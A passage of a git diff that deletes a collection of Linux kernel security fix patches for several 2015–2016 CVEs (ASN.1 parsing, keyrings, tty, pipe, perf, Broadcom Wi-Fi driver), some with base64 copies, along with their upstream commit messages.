--				   sizeof(user)))
--			return -EFAULT;
--		kernel.l_type	= user.l_type;
--		kernel.l_whence	= user.l_whence;
--		kernel.l_start	= user.l_start;
--		kernel.l_len	= user.l_len;
--		kernel.l_pid	= user.l_pid;
--		local_arg = (unsigned long)&kernel;
--		fs = get_fs();
--		set_fs(KERNEL_DS);
--	}
--
--	ret = sys_fcntl64(fd, cmd, local_arg);
-+		return do_locks(fd, cmd, arg);
- 
--	switch (cmd) {
--	case F_GETLK64:
--		if (!ret) {
--			user.l_type	= kernel.l_type;
--			user.l_whence	= kernel.l_whence;
--			user.l_start	= kernel.l_start;
--			user.l_len	= kernel.l_len;
--			user.l_pid	= kernel.l_pid;
--			if (copy_to_user((struct oabi_flock64 __user *)arg,
--					 &user, sizeof(user)))
--				ret = -EFAULT;
--		}
--	case F_SETLK64:
--	case F_SETLKW64:
--		set_fs(fs);
-+	default:
-+		return sys_fcntl64(fd, cmd, arg);
- 	}
--
--	return ret;
- }
- 
- struct oabi_epoll_event {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8967/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8967/ANY/0001.patch
deleted file mode 100644
index d87953ea..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8967/ANY/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From c623b33b4e9599c6ac5076f7db7369eb9869aa04 Mon Sep 17 00:00:00 2001
-From: Mark Rutland <mark.rutland@arm.com>
-Date: Thu, 8 Jan 2015 11:42:59 +0000
-Subject: arm64: make sys_call_table const
-
-As with x86, mark the sys_call_table const such that it will be placed
-in the .rodata section. This will cause attempts to modify the table
-(accidental or deliberate) to fail when strict page permissions are in
-place. In the absence of strict page permissions, there should be no
-functional change.
-
-Signed-off-by: Mark Rutland <mark.rutland@arm.com>
-Acked-by: Will Deacon <will.deacon@arm.com>
-Signed-off-by: Catalin Marinas <catalin.marinas@arm.com>
----
- arch/arm64/kernel/sys.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/arch/arm64/kernel/sys.c b/arch/arm64/kernel/sys.c
-index dec351a..75151aa 100644
---- a/arch/arm64/kernel/sys.c
-+++ b/arch/arm64/kernel/sys.c
-@@ -49,7 +49,7 @@ asmlinkage long sys_rt_sigreturn_wrapper(void);
-  * The sys_call_table array must be 4K aligned to be accessible from
-  * kernel/entry.S.
-  */
--void *sys_call_table[__NR_syscalls] __aligned(4096) = {
-+void * const sys_call_table[__NR_syscalls] __aligned(4096) = {
- 	[0 ... __NR_syscalls - 1] = sys_ni_syscall,
- #include <asm/unistd.h>
- };
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-9004/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-9004/ANY/0001.patch
deleted file mode 100644
index bbc24aca..00000000
--- a/Patches/Linux_CVEs/CVE-2015-9004/ANY/0001.patch
+++ /dev/null
@@ -1,91 +0,0 @@
-From c3c87e770458aa004bd7ed3f29945ff436fd6511 Mon Sep 17 00:00:00 2001
-From: Peter Zijlstra <peterz@infradead.org>
-Date: Fri, 23 Jan 2015 11:19:48 +0100
-Subject: perf: Tighten (and fix) the grouping condition
-
-The fix from 9fc81d87420d ("perf: Fix events installation during
-moving group") was incomplete in that it failed to recognise that
-creating a group with events for different CPUs is semantically
-broken -- they cannot be co-scheduled.
-
-Furthermore, it leads to real breakage where, when we create an event
-for CPU Y and then migrate it to form a group on CPU X, the code gets
-confused where the counter is programmed -- triggered in practice
-as well by me via the perf fuzzer.
-
-Fix this by tightening the rules for creating groups. Only allow
-grouping of counters that can be co-scheduled in the same context.
-This means for the same task and/or the same cpu.
-
-Fixes: 9fc81d87420d ("perf: Fix events installation during moving group")
-Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
-Cc: Arnaldo Carvalho de Melo <acme@kernel.org>
-Cc: Jiri Olsa <jolsa@redhat.com>
-Cc: Linus Torvalds <torvalds@linux-foundation.org>
-Link: http://lkml.kernel.org/r/20150123125834.090683288@infradead.org
-Signed-off-by: Ingo Molnar <mingo@kernel.org>
----
- include/linux/perf_event.h |  6 ------
- kernel/events/core.c       | 15 +++++++++++++--
- 2 files changed, 13 insertions(+), 8 deletions(-)
-
-diff --git a/include/linux/perf_event.h b/include/linux/perf_event.h
-index 4f7a61c..664de5a 100644
---- a/include/linux/perf_event.h
-+++ b/include/linux/perf_event.h
-@@ -450,11 +450,6 @@ struct perf_event {
- #endif /* CONFIG_PERF_EVENTS */
- };
- 
--enum perf_event_context_type {
--	task_context,
--	cpu_context,
--};
--
- /**
-  * struct perf_event_context - event context structure
-  *
-@@ -462,7 +457,6 @@ enum perf_event_context_type {
-  */
- struct perf_event_context {
- 	struct pmu			*pmu;
--	enum perf_event_context_type	type;
- 	/*
- 	 * Protect the states of the events in the list,
- 	 * nr_active, and the list:
-diff --git a/kernel/events/core.c b/kernel/events/core.c
-index 882f835a..19efcf1 100644
---- a/kernel/events/core.c
-+++ b/kernel/events/core.c
-@@ -6776,7 +6776,6 @@ skip_type:
- 		__perf_event_init_context(&cpuctx->ctx);
- 		lockdep_set_class(&cpuctx->ctx.mutex, &cpuctx_mutex);
- 		lockdep_set_class(&cpuctx->ctx.lock, &cpuctx_lock);
--		cpuctx->ctx.type = cpu_context;
- 		cpuctx->ctx.pmu = pmu;
- 
- 		__perf_cpu_hrtimer_init(cpuctx, cpu);
-@@ -7420,7 +7419,19 @@ SYSCALL_DEFINE5(perf_event_open,
- 		 * task or CPU context:
- 		 */
- 		if (move_group) {
--			if (group_leader->ctx->type != ctx->type)
-+			/*
-+			 * Make sure we're both on the same task, or both
-+			 * per-cpu events.
-+			 */
-+			if (group_leader->ctx->task != ctx->task)
-+				goto err_context;
-+
-+			/*
-+			 * Make sure we're both events for the same CPU;
-+			 * grouping events for different CPUs is broken; since
-+			 * you can never concurrently schedule them anyhow.
-+			 */
-+			if (group_leader->cpu != event->cpu)
- 				goto err_context;
- 		} else {
- 			if (group_leader->ctx != ctx)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0723/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-0723/ANY/0001.patch
deleted file mode 100644
index 6061ad90..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0723/ANY/0001.patch
+++ /dev/null
@@ -1,69 +0,0 @@
-From 5c17c861a357e9458001f021a7afa7aab9937439 Mon Sep 17 00:00:00 2001
-From: Peter Hurley <peter@hurleysoftware.com>
-Date: Sun, 10 Jan 2016 22:40:55 -0800
-Subject: tty: Fix unsafe ldisc reference via ioctl(TIOCGETD)
-
-ioctl(TIOCGETD) retrieves the line discipline id directly from the
-ldisc because the line discipline id (c_line) in termios is untrustworthy;
-userspace may have set termios via ioctl(TCSETS*) without actually
-changing the line discipline via ioctl(TIOCSETD).
-
-However, directly accessing the current ldisc via tty->ldisc is
-unsafe; the ldisc ptr dereferenced may be stale if the line discipline
-is changing via ioctl(TIOCSETD) or hangup.
-
-Wait for the line discipline reference (just like read() or write())
-to retrieve the "current" line discipline id.
-
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Peter Hurley <peter@hurleysoftware.com>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/tty/tty_io.c | 24 +++++++++++++++++++++++-
- 1 file changed, 23 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/tty/tty_io.c b/drivers/tty/tty_io.c
-index a1b36bf..5cec01c 100644
---- a/drivers/tty/tty_io.c
-+++ b/drivers/tty/tty_io.c
-@@ -2659,6 +2659,28 @@ static int tiocsetd(struct tty_struct *tty, int __user *p)
- }
- 
- /**
-+ *	tiocgetd	-	get line discipline
-+ *	@tty: tty device
-+ *	@p: pointer to user data
-+ *
-+ *	Retrieves the line discipline id directly from the ldisc.
-+ *
-+ *	Locking: waits for ldisc reference (in case the line discipline
-+ *		is changing or the tty is being hungup)
-+ */
-+
-+static int tiocgetd(struct tty_struct *tty, int __user *p)
-+{
-+	struct tty_ldisc *ld;
-+	int ret;
-+
-+	ld = tty_ldisc_ref_wait(tty);
-+	ret = put_user(ld->ops->num, p);
-+	tty_ldisc_deref(ld);
-+	return ret;
-+}
-+
-+/**
-  *	send_break	-	performed time break
-  *	@tty: device to break on
-  *	@duration: timeout in mS
-@@ -2884,7 +2906,7 @@ long tty_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- 	case TIOCGSID:
- 		return tiocgsid(tty, real_tty, p);
- 	case TIOCGETD:
--		return put_user(tty->ldisc->ops->num, (int __user *)p);
-+		return tiocgetd(tty, p);
- 	case TIOCSETD:
- 		return tiocsetd(tty, p);
- 	case TIOCVHANGUP:
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0728/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-0728/3.10/0001.patch
deleted file mode 100644
index 3ebb9904..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0728/3.10/0001.patch
+++ /dev/null
@@ -1,12 +0,0 @@
-diff --git a/security/keys/process_keys.c b/security/keys/process_keys.c
-index 42defae..cd871dc 100644
---- a/security/keys/process_keys.c
-+++ b/security/keys/process_keys.c
-@@ -792,6 +792,7 @@
- 		ret = PTR_ERR(keyring);
- 		goto error2;
- 	} else if (keyring == new->session_keyring) {
-+		key_put(keyring);
- 		ret = 0;
- 		goto error2;
- 	}
diff --git a/Patches/Linux_CVEs/CVE-2016-0728/3.10/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-0728/3.10/0001.patch.base64
deleted file mode 100644
index a6fb1945..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0728/3.10/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL3NlY3VyaXR5L2tleXMvcHJvY2Vzc19rZXlzLmMgYi9zZWN1cml0eS9rZXlzL3Byb2Nlc3Nfa2V5cy5jCmluZGV4IDQyZGVmYWUuLmNkODcxZGMgMTAwNjQ0Ci0tLSBhL3NlY3VyaXR5L2tleXMvcHJvY2Vzc19rZXlzLmMKKysrIGIvc2VjdXJpdHkva2V5cy9wcm9jZXNzX2tleXMuYwpAQCAtNzkyLDYgKzc5Miw3IEBACiAJCXJldCA9IFBUUl9FUlIoa2V5cmluZyk7CiAJCWdvdG8gZXJyb3IyOwogCX0gZWxzZSBpZiAoa2V5cmluZyA9PSBuZXctPnNlc3Npb25fa2V5cmluZykgeworCQlrZXlfcHV0KGtleXJpbmcpOwogCQlyZXQgPSAwOwogCQlnb3RvIGVycm9yMjsKIAl9Cg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-0728/3.14/0002.patch b/Patches/Linux_CVEs/CVE-2016-0728/3.14/0002.patch
deleted file mode 100644
index 7def8f99..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0728/3.14/0002.patch
+++ /dev/null
@@ -1,12 +0,0 @@
-diff --git a/security/keys/process_keys.c b/security/keys/process_keys.c
-index 0cf8a13..4e56371 100644
---- a/security/keys/process_keys.c
-+++ b/security/keys/process_keys.c
-@@ -793,6 +793,7 @@
- 		ret = PTR_ERR(keyring);
- 		goto error2;
- 	} else if (keyring == new->session_keyring) {
-+		key_put(keyring);
- 		ret = 0;
- 		goto error2;
- 	}
diff --git a/Patches/Linux_CVEs/CVE-2016-0728/3.14/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2016-0728/3.14/0002.patch.base64
deleted file mode 100644
index 66865b24..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0728/3.14/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL3NlY3VyaXR5L2tleXMvcHJvY2Vzc19rZXlzLmMgYi9zZWN1cml0eS9rZXlzL3Byb2Nlc3Nfa2V5cy5jCmluZGV4IDBjZjhhMTMuLjRlNTYzNzEgMTAwNjQ0Ci0tLSBhL3NlY3VyaXR5L2tleXMvcHJvY2Vzc19rZXlzLmMKKysrIGIvc2VjdXJpdHkva2V5cy9wcm9jZXNzX2tleXMuYwpAQCAtNzkzLDYgKzc5Myw3IEBACiAJCXJldCA9IFBUUl9FUlIoa2V5cmluZyk7CiAJCWdvdG8gZXJyb3IyOwogCX0gZWxzZSBpZiAoa2V5cmluZyA9PSBuZXctPnNlc3Npb25fa2V5cmluZykgeworCQlrZXlfcHV0KGtleXJpbmcpOwogCQlyZXQgPSAwOwogCQlnb3RvIGVycm9yMjsKIAl9Cg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-0728/3.18/0003.patch b/Patches/Linux_CVEs/CVE-2016-0728/3.18/0003.patch
deleted file mode 100644
index c45c3c72..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0728/3.18/0003.patch
+++ /dev/null
@@ -1,12 +0,0 @@
-diff --git a/security/keys/process_keys.c b/security/keys/process_keys.c
-index bd536cb..db91639 100644
---- a/security/keys/process_keys.c
-+++ b/security/keys/process_keys.c
-@@ -794,6 +794,7 @@
- 		ret = PTR_ERR(keyring);
- 		goto error2;
- 	} else if (keyring == new->session_keyring) {
-+		key_put(keyring);
- 		ret = 0;
- 		goto error2;
- 	}
diff --git a/Patches/Linux_CVEs/CVE-2016-0728/3.18/0003.patch.base64 b/Patches/Linux_CVEs/CVE-2016-0728/3.18/0003.patch.base64
deleted file mode 100644
index 5841bc83..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0728/3.18/0003.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL3NlY3VyaXR5L2tleXMvcHJvY2Vzc19rZXlzLmMgYi9zZWN1cml0eS9rZXlzL3Byb2Nlc3Nfa2V5cy5jCmluZGV4IGJkNTM2Y2IuLmRiOTE2MzkgMTAwNjQ0Ci0tLSBhL3NlY3VyaXR5L2tleXMvcHJvY2Vzc19rZXlzLmMKKysrIGIvc2VjdXJpdHkva2V5cy9wcm9jZXNzX2tleXMuYwpAQCAtNzk0LDYgKzc5NCw3IEBACiAJCXJldCA9IFBUUl9FUlIoa2V5cmluZyk7CiAJCWdvdG8gZXJyb3IyOwogCX0gZWxzZSBpZiAoa2V5cmluZyA9PSBuZXctPnNlc3Npb25fa2V5cmluZykgeworCQlrZXlfcHV0KGtleXJpbmcpOwogCQlyZXQgPSAwOwogCQlnb3RvIGVycm9yMjsKIAl9Cg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-0728/4.1/0004.patch b/Patches/Linux_CVEs/CVE-2016-0728/4.1/0004.patch
deleted file mode 100644
index c45c3c72..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0728/4.1/0004.patch
+++ /dev/null
@@ -1,12 +0,0 @@
-diff --git a/security/keys/process_keys.c b/security/keys/process_keys.c
-index bd536cb..db91639 100644
---- a/security/keys/process_keys.c
-+++ b/security/keys/process_keys.c
-@@ -794,6 +794,7 @@
- 		ret = PTR_ERR(keyring);
- 		goto error2;
- 	} else if (keyring == new->session_keyring) {
-+		key_put(keyring);
- 		ret = 0;
- 		goto error2;
- 	}
diff --git a/Patches/Linux_CVEs/CVE-2016-0728/4.1/0004.patch.base64 b/Patches/Linux_CVEs/CVE-2016-0728/4.1/0004.patch.base64
deleted file mode 100644
index 5841bc83..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0728/4.1/0004.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL3NlY3VyaXR5L2tleXMvcHJvY2Vzc19rZXlzLmMgYi9zZWN1cml0eS9rZXlzL3Byb2Nlc3Nfa2V5cy5jCmluZGV4IGJkNTM2Y2IuLmRiOTE2MzkgMTAwNjQ0Ci0tLSBhL3NlY3VyaXR5L2tleXMvcHJvY2Vzc19rZXlzLmMKKysrIGIvc2VjdXJpdHkva2V5cy9wcm9jZXNzX2tleXMuYwpAQCAtNzk0LDYgKzc5NCw3IEBACiAJCXJldCA9IFBUUl9FUlIoa2V5cmluZyk7CiAJCWdvdG8gZXJyb3IyOwogCX0gZWxzZSBpZiAoa2V5cmluZyA9PSBuZXctPnNlc3Npb25fa2V5cmluZykgeworCQlrZXlfcHV0KGtleXJpbmcpOwogCQlyZXQgPSAwOwogCQlnb3RvIGVycm9yMjsKIAl9Cg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-0758/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-0758/ANY/0001.patch
deleted file mode 100644
index 016fbe0f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0758/ANY/0001.patch
+++ /dev/null
@@ -1,91 +0,0 @@
-From 23c8a812dc3c621009e4f0e5342aa4e2ede1ceaa Mon Sep 17 00:00:00 2001
-From: David Howells <dhowells@redhat.com>
-Date: Tue, 23 Feb 2016 11:03:12 +0000
-Subject: KEYS: Fix ASN.1 indefinite length object parsing
-
-This fixes CVE-2016-0758.
-
-In the ASN.1 decoder, when the length field of an ASN.1 value is extracted,
-it isn't validated against the remaining amount of data before being added
-to the cursor.  With a sufficiently large size indicated, the check:
-
-	datalen - dp < 2
-
-may then fail due to integer overflow.
-
-Fix this by checking the length indicated against the amount of remaining
-data in both places a definite length is determined.
-
-Whilst we're at it, make the following changes:
-
- (1) Check the maximum size of extended length does not exceed the capacity
-     of the variable it's being stored in (len) rather than the type that
-     variable is assumed to be (size_t).
-
- (2) Compare the EOC tag to the symbolic constant ASN1_EOC rather than the
-     integer 0.
-
- (3) To reduce confusion, move the initialisation of len outside of:
-
-	for (len = 0; n > 0; n--) {
-
-     since it doesn't have anything to do with the loop counter n.
-
-Signed-off-by: David Howells <dhowells@redhat.com>
-Reviewed-by: Mimi Zohar <zohar@linux.vnet.ibm.com>
-Acked-by: David Woodhouse <David.Woodhouse@intel.com>
-Acked-by: Peter Jones <pjones@redhat.com>
----
- lib/asn1_decoder.c | 16 +++++++++-------
- 1 file changed, 9 insertions(+), 7 deletions(-)
-
-diff --git a/lib/asn1_decoder.c b/lib/asn1_decoder.c
-index 2b3f46c..5545229 100644
---- a/lib/asn1_decoder.c
-+++ b/lib/asn1_decoder.c
-@@ -74,7 +74,7 @@ next_tag:
- 
- 	/* Extract a tag from the data */
- 	tag = data[dp++];
--	if (tag == 0) {
-+	if (tag == ASN1_EOC) {
- 		/* It appears to be an EOC. */
- 		if (data[dp++] != 0)
- 			goto invalid_eoc;
-@@ -96,10 +96,8 @@ next_tag:
- 
- 	/* Extract the length */
- 	len = data[dp++];
--	if (len <= 0x7f) {
--		dp += len;
--		goto next_tag;
--	}
-+	if (len <= 0x7f)
-+		goto check_length;
- 
- 	if (unlikely(len == ASN1_INDEFINITE_LENGTH)) {
- 		/* Indefinite length */
-@@ -110,14 +108,18 @@ next_tag:
- 	}
- 
- 	n = len - 0x80;
--	if (unlikely(n > sizeof(size_t) - 1))
-+	if (unlikely(n > sizeof(len) - 1))
- 		goto length_too_long;
- 	if (unlikely(n > datalen - dp))
- 		goto data_overrun_error;
--	for (len = 0; n > 0; n--) {
-+	len = 0;
-+	for (; n > 0; n--) {
- 		len <<= 8;
- 		len |= data[dp++];
- 	}
-+check_length:
-+	if (len > datalen - dp)
-+		goto data_overrun_error;
- 	dp += len;
- 	goto next_tag;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0774/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-0774/ANY/0001.patch
deleted file mode 100644
index b77c1a66..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0774/ANY/0001.patch
+++ /dev/null
@@ -1,63 +0,0 @@
-From b381fbc509052d07ccf8641fd7560a25d46aaf1e Mon Sep 17 00:00:00 2001
-From: Ben Hutchings <ben@decadent.org.uk>
-Date: Sat, 13 Feb 2016 02:34:52 +0000
-Subject: pipe: Fix buffer offset after partially failed read
-
-Quoting the RHEL advisory:
-
-> It was found that the fix for CVE-2015-1805 incorrectly kept buffer
-> offset and buffer length in sync on a failed atomic read, potentially
-> resulting in a pipe buffer state corruption. A local, unprivileged user
-> could use this flaw to crash the system or leak kernel memory to user
-> space. (CVE-2016-0774, Moderate)
-
-The same flawed fix was applied to stable branches from 2.6.32.y to
-3.14.y inclusive, and I was able to reproduce the issue on 3.2.y.
-We need to give pipe_iov_copy_to_user() a separate offset variable
-and only update the buffer offset if it succeeds.
-
-References: https://rhn.redhat.com/errata/RHSA-2016-0103.html
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
-Cc: Jeffrey Vander Stoep <jeffv@google.com>
-Signed-off-by: Zefan Li <lizefan@huawei.com>
----
- fs/pipe.c | 5 ++++-
- 1 file changed, 4 insertions(+), 1 deletion(-)
-
-(limited to 'fs/pipe.c')
-
-diff --git a/fs/pipe.c b/fs/pipe.c
-index abfb935..6049235 100644
---- a/fs/pipe.c
-+++ b/fs/pipe.c
-@@ -390,6 +390,7 @@ pipe_read(struct kiocb *iocb, const struct iovec *_iov,
- 			void *addr;
- 			size_t chars = buf->len, remaining;
- 			int error, atomic;
-+			int offset;
- 
- 			if (chars > total_len)
- 				chars = total_len;
-@@ -403,9 +404,10 @@ pipe_read(struct kiocb *iocb, const struct iovec *_iov,
- 
- 			atomic = !iov_fault_in_pages_write(iov, chars);
- 			remaining = chars;
-+			offset = buf->offset;
- redo:
- 			addr = ops->map(pipe, buf, atomic);
--			error = pipe_iov_copy_to_user(iov, addr, &buf->offset,
-+			error = pipe_iov_copy_to_user(iov, addr, &offset,
- 						      &remaining, atomic);
- 			ops->unmap(pipe, buf, addr);
- 			if (unlikely(error)) {
-@@ -421,6 +423,7 @@ redo:
- 				break;
- 			}
- 			ret += chars;
-+			buf->offset += chars;
- 			buf->len -= chars;
- 
- 			/* Was it a packet buffer? Clean up and exit */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0801/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-0801/ANY/0001.patch
deleted file mode 100644
index 4107b031..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0801/ANY/0001.patch
+++ /dev/null
@@ -1,28 +0,0 @@
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-index e9eb33d..f2ba9c8 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-@@ -1173,8 +1173,9 @@
- 			WL_DBG(("  attr WPS_ID_CONFIG_METHODS: %x\n", HTON16(val)));
- 		} else if (subelt_id == WPS_ID_DEVICE_NAME) {
- 			char devname[100];
--			memcpy(devname, subel, subelt_len);
--			devname[subelt_len] = '\0';
-+			size_t namelen = MIN(subelt_len, sizeof(devname));
-+			memcpy(devname, subel, namelen);
-+			devname[namelen-1] = '\0';
- 			WL_DBG(("  attr WPS_ID_DEVICE_NAME: %s (len %u)\n",
- 				devname, subelt_len));
- 		} else if (subelt_id == WPS_ID_DEVICE_PWD_ID) {
-@@ -9678,9 +9679,9 @@
- 			 * scan request in the form of cfg80211_scan_request. For timebeing, create
- 			 * cfg80211_scan_request one out of the received PNO event.
- 			 */
-+			ssid[i].ssid_len = MIN(DOT11_MAX_SSID_LEN, netinfo->pfnsubnet.SSID_len);
- 			memcpy(ssid[i].ssid, netinfo->pfnsubnet.SSID,
--				netinfo->pfnsubnet.SSID_len);
--			ssid[i].ssid_len = netinfo->pfnsubnet.SSID_len;
-+			       ssid[i].ssid_len);
- 			request->n_ssids++;
- 
- 			channel_req = netinfo->pfnsubnet.channel;
diff --git a/Patches/Linux_CVEs/CVE-2016-0801/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-0801/ANY/0001.patch.base64
deleted file mode 100644
index 0d485ae7..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0801/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2RyaXZlcnMvbmV0L3dpcmVsZXNzL2JjbWRoZC93bF9jZmc4MDIxMS5jIGIvZHJpdmVycy9uZXQvd2lyZWxlc3MvYmNtZGhkL3dsX2NmZzgwMjExLmMKaW5kZXggZTllYjMzZC4uZjJiYTljOCAxMDA2NDQKLS0tIGEvZHJpdmVycy9uZXQvd2lyZWxlc3MvYmNtZGhkL3dsX2NmZzgwMjExLmMKKysrIGIvZHJpdmVycy9uZXQvd2lyZWxlc3MvYmNtZGhkL3dsX2NmZzgwMjExLmMKQEAgLTExNzMsOCArMTE3Myw5IEBACiAJCQlXTF9EQkcoKCIgIGF0dHIgV1BTX0lEX0NPTkZJR19NRVRIT0RTOiAleFxuIiwgSFRPTjE2KHZhbCkpKTsKIAkJfSBlbHNlIGlmIChzdWJlbHRfaWQgPT0gV1BTX0lEX0RFVklDRV9OQU1FKSB7CiAJCQljaGFyIGRldm5hbWVbMTAwXTsKLQkJCW1lbWNweShkZXZuYW1lLCBzdWJlbCwgc3ViZWx0X2xlbik7Ci0JCQlkZXZuYW1lW3N1YmVsdF9sZW5dID0gJ1wwJzsKKwkJCXNpemVfdCBuYW1lbGVuID0gTUlOKHN1YmVsdF9sZW4sIHNpemVvZihkZXZuYW1lKSk7CisJCQltZW1jcHkoZGV2bmFtZSwgc3ViZWwsIG5hbWVsZW4pOworCQkJZGV2bmFtZVtuYW1lbGVuLTFdID0gJ1wwJzsKIAkJCVdMX0RCRygoIiAgYXR0ciBXUFNfSURfREVWSUNFX05BTUU6ICVzIChsZW4gJXUpXG4iLAogCQkJCWRldm5hbWUsIHN1YmVsdF9sZW4pKTsKIAkJfSBlbHNlIGlmIChzdWJlbHRfaWQgPT0gV1BTX0lEX0RFVklDRV9QV0RfSUQpIHsKQEAgLTk2NzgsOSArOTY3OSw5IEBACiAJCQkgKiBzY2FuIHJlcXVlc3QgaW4gdGhlIGZvcm0gb2YgY2ZnODAyMTFfc2Nhbl9yZXF1ZXN0LiBGb3IgdGltZWJlaW5nLCBjcmVhdGUKIAkJCSAqIGNmZzgwMjExX3NjYW5fcmVxdWVzdCBvbmUgb3V0IG9mIHRoZSByZWNlaXZlZCBQTk8gZXZlbnQuCiAJCQkgKi8KKwkJCXNzaWRbaV0uc3NpZF9sZW4gPSBNSU4oRE9UMTFfTUFYX1NTSURfTEVOLCBuZXRpbmZvLT5wZm5zdWJuZXQuU1NJRF9sZW4pOwogCQkJbWVtY3B5KHNzaWRbaV0uc3NpZCwgbmV0aW5mby0+cGZuc3VibmV0LlNTSUQsCi0JCQkJbmV0aW5mby0+cGZuc3VibmV0LlNTSURfbGVuKTsKLQkJCXNzaWRbaV0uc3NpZF9sZW4gPSBuZXRpbmZvLT5wZm5zdWJuZXQuU1NJRF9sZW47CisJCQkgICAgICAgc3NpZFtpXS5zc2lkX2xlbik7CiAJCQlyZXF1ZXN0LT5uX3NzaWRzKys7CiAKIAkJCWNoYW5uZWxfcmVxID0gbmV0aW5mby0+cGZuc3VibmV0LmNoYW5uZWw7Cg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-0802/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-0802/ANY/0001.patch
deleted file mode 100644
index 81904b74..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0802/ANY/0001.patch
+++ /dev/null
@@ -1,152 +0,0 @@
-diff --git a/drivers/net/wireless/bcmdhd/dhd.h b/drivers/net/wireless/bcmdhd/dhd.h
-index 8c3f0f6..5e33262 100644
---- a/drivers/net/wireless/bcmdhd/dhd.h
-+++ b/drivers/net/wireless/bcmdhd/dhd.h
-@@ -813,7 +813,7 @@
- extern int dhd_net2idx(struct dhd_info *dhd, struct net_device *net);
- extern struct net_device * dhd_idx2net(void *pub, int ifidx);
- extern int net_os_send_hang_message(struct net_device *dev);
--extern int wl_host_event(dhd_pub_t *dhd_pub, int *idx, void *pktdata,
-+extern int wl_host_event(dhd_pub_t *dhd_pub, int *idx, void *pktdata, size_t pktlen,
-                          wl_event_msg_t *, void **data_ptr,  void *);
- extern void wl_event_to_host_order(wl_event_msg_t * evt);
- 
-diff --git a/drivers/net/wireless/bcmdhd/dhd_common.c b/drivers/net/wireless/bcmdhd/dhd_common.c
-index 8a6882f..201a0ac 100644
---- a/drivers/net/wireless/bcmdhd/dhd_common.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_common.c
-@@ -109,7 +109,7 @@
- extern int dhd_socram_dump(struct dhd_bus *bus);
- #ifdef DNGL_EVENT_SUPPORT
- static void dngl_host_event_process(dhd_pub_t *dhdp, bcm_dngl_event_t *event);
--static int dngl_host_event(dhd_pub_t *dhdp, void *pktdata);
-+static int dngl_host_event(dhd_pub_t *dhdp, void *pktdata, size_t pktlen);
- #endif /* DNGL_EVENT_SUPPORT */
- bool ap_cfg_running = FALSE;
- bool ap_fw_loaded = FALSE;
-@@ -1380,7 +1380,7 @@
- #ifdef DNGL_EVENT_SUPPORT
- /* Check whether packet is a BRCM dngl event pkt. If it is, process event data. */
- int
--dngl_host_event(dhd_pub_t *dhdp, void *pktdata)
-+dngl_host_event(dhd_pub_t *dhdp, void *pktdata, size_t pktlen)
- {
- 	bcm_dngl_event_t *pvt_data = (bcm_dngl_event_t *)pktdata;
- 
-@@ -1391,14 +1391,14 @@
- 	/* Check to see if this is a DNGL event */
- 	if (ntoh16_ua((void *)&pvt_data->bcm_hdr.usr_subtype) ==
- 		BCMILCP_BCM_SUBTYPE_DNGLEVENT) {
--  		dngl_host_event_process(dhdp, pvt_data);
-+  		dngl_host_event_process(dhdp, pvt_data, pktlen);
- 		return BCME_OK;
- 	}
- 	return BCME_ERROR;
- }
- 
- void
--dngl_host_event_process(dhd_pub_t *dhdp, bcm_dngl_event_t *event)
